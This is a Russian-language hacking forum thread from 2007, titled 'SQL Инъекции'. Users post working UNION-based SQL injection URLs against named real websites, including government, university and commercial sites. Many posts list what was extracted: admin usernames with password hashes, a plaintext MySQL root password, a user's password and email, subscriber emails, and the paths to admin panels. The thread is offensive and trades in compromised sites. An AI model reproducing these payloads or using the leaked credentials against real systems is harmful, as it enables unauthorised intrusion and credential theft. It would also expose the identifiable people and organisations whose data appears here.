SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    Железо
    Code:
    http://www.legionhardware.com/document.php?id=-11111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(name,char(58),password),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users/*
    
    Демократия в Америке
    Code:
    http://www.dfalink.com/event.php?id=-11111+UNION+SELECT+1,concat(email,char(58),password),3,4,5,6,7,8,9,10,concat(USER(),char(58),VERSION(),char(58),DATABASE()),12,13,14,15,16,17,18,19,20,21,22,23,24+from+members/*
    
    Правда траблы с кодировкой пасса
     
  2. cRiLaZ

    cRiLaZ Member

    Joined:
    17 Oct 2006
    Messages:
    21
    Likes Received:
    15
    Reputations:
    18
    http://www.ze-linux.org/index.php?id_news=-825+union+select+666/*
     
    1 person likes this.
  3. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    737
    Likes Received:
    376
    Reputations:
    235
    mc-laren.ru
    Code:
    http://www.mc-laren.ru/news.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12+from+users/*
    а еще там есть форум...
     
    2 people like this.
  4. REx07

    REx07 New Member

    Joined:
    1 May 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    1
    Для НЕлюбителей косметики:
    Code:
    _http://www.wizaz.pl/porady/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
    Админка сайта тут:
    _http://www.wizaz.pl/porady/admin.php
     
    1 person likes this.
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    737
    Likes Received:
    376
    Reputations:
    235
    70 email'ов)))
    kontrudar.ru
    Code:
    http://www.kontrudar.ru/material.php?id=15+and+0=-1+union+select+email,2,3,4,5,null,7,8,9,10,11,12,13+from+ic_subscribers+limit+70,1/*
    тайтл

    пробелы убирать надо
     
    #2125 n1†R0x, 4 May 2007
    Last edited: 4 May 2007
    2 people like this.
  6. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    285
    Likes Received:
    597
    Reputations:
    514
    Клуб Выпускников Московского Физико-Технического Института

    www.miptclub.ru

    Code:
    http://miptclub.ru/inner/modules/gallery/gallery.php?act=show_gallery&id=-1+union+sel ect+convert(version ()+using+binary)/ *
    Admin: amavis
    Password(hash):623deab31fd6dd48

    Админка: www.miptclub.ru/admin

    Уже мона коллекционировать - прошлый раз ассоциация выпускников МГИМО, теперь МФТИ! :D :D
     
    1 person likes this.
  7. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    __http://www-illigal.ge.uiuc.edu/system/reports/abstract.php?id=339992+union+select+1,2,3,4,5,6,AES _DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9,10--
     
    2 people like this.
  8. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    Center For Law and Social Policy
    Code:
    http://www.clasp.org/publications.php?id=-1111+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+user/*
    
     
    1 person likes this.
  9. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    КВН в НГУ
     
  10. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Футбол. Луч-Энергия (Неофициальный сайт)

    Сайт: http://luch-vlad.ru/index.php
    уязвимость: http://luch-vlad.ru/index.php?option=com_datsogallery&func=detail&id='
    подобранные таблицы: jos_users
    подобранные поля: username,password,email,name
    1960 организмов
    admin:8e16abc167627ba17495079c609efa6d (111280)
    админка
    форум 2155 организмов
     
    #2130 Серенький, 4 May 2007
    Last edited: 4 May 2007
    1 person likes this.
  11. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    Ну, во-первых, не все сайты интересные и посещаемые, уязвимости есть не на всех, а на многих из тех, которые уязвимы, не всегда получается подобрать названия полезных таблиц. И еще реже получается попасть в админку и шелл заюзать.
    Плюс бывают интересные особенности, фильтрации и т.п.
     
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    803
    Likes Received:
    710
    Reputations:
    301
    Dracula4ever сделай хотя бы одну иньекцию на asp
     
    1 person likes this.
  13. REx07

    REx07 New Member

    Joined:
    1 May 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    1
    Что касается аспа...
    Тут какая-то турецкая муть:

    _http://www.banaz.bel.tr/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

    для получения пасса меняем на "sifre"

    Админка валяется тут:
    http://www.banaz.bel.tr/admin/kontrol.asp
     
  14. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    .gov
    Code:
    http://www.maineservicecommission.gov/MVF/article.php?ID=-111+UNION+SELECT+1,2,concat(USER(),char(58),VERSION(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/*
    
     
    2 people like this.
  15. Серенький

    Joined:
    13 Apr 2007
    Messages:
    119
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Футбол.

    Сайт: www.liverpoolfc.ru
    уязвимость: http://www.liverpoolfc.ru/news.php?id=1673'
    подобранные таблицы: users
    подобранные поля: user_name,user_pass,user_id
    1:Jari:034054de62d75ca7
    админка
    Не окончено:
    http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - Проблемы с выводом
     
    1 person likes this.
  16. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    196
    Likes Received:
    88
    Reputations:
    -7
    Code:
    http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-1111+UNION+SELECT+1,2,name,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+2,1/*
    
    .gov
    Code:
    http://www.dswd.gov.ph/ProgProj.php?id=-1111+UNION+SELECT+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/*
    
    MySQL root:zaq12345
     
    #2136 maxster, 5 May 2007
    Last edited: 8 May 2007
  17. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,128
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://poetry.h1.ru/article.php?sid=-526+union+select+1,2,3,4,password,email,7,username,9,10,11+from+members/*
    user:perfilov
    password:248192
    email:dood@webserver.com
    Code:
    http://outyourbackdoor.com/article.php?id=-684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*
     
    1 person likes this.
  18. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    nero.com

    Code:
    http://www.nero.com/eng/showpress.php?id=-1+union+select+1,2,3/*
    stpatsfc.com
    Code:
    http://www.stpatsfc.com/news.php?id=-1+union+select+1,2,3/*
     
    #2138 Dracula4ever, 5 May 2007
    Last edited: 5 May 2007
  19. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    803
    Likes Received:
    710
    Reputations:
    301
    Дракула и то и другое жесточайший боян- http://hlamidnik.h18.ru/SQLS.html
     
  20. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    31
    Likes Received:
    49
    Reputations:
    3
    www.sdg.ncsa.uiuc.edu
    Национальный Центр высокоэффективных вычислительных ресурсов NCSA

    Code:
    http://sdg.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1+union+select+1,concat(user(),0x203a20,database()),3,4,5,6,7,8,9,10/*
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.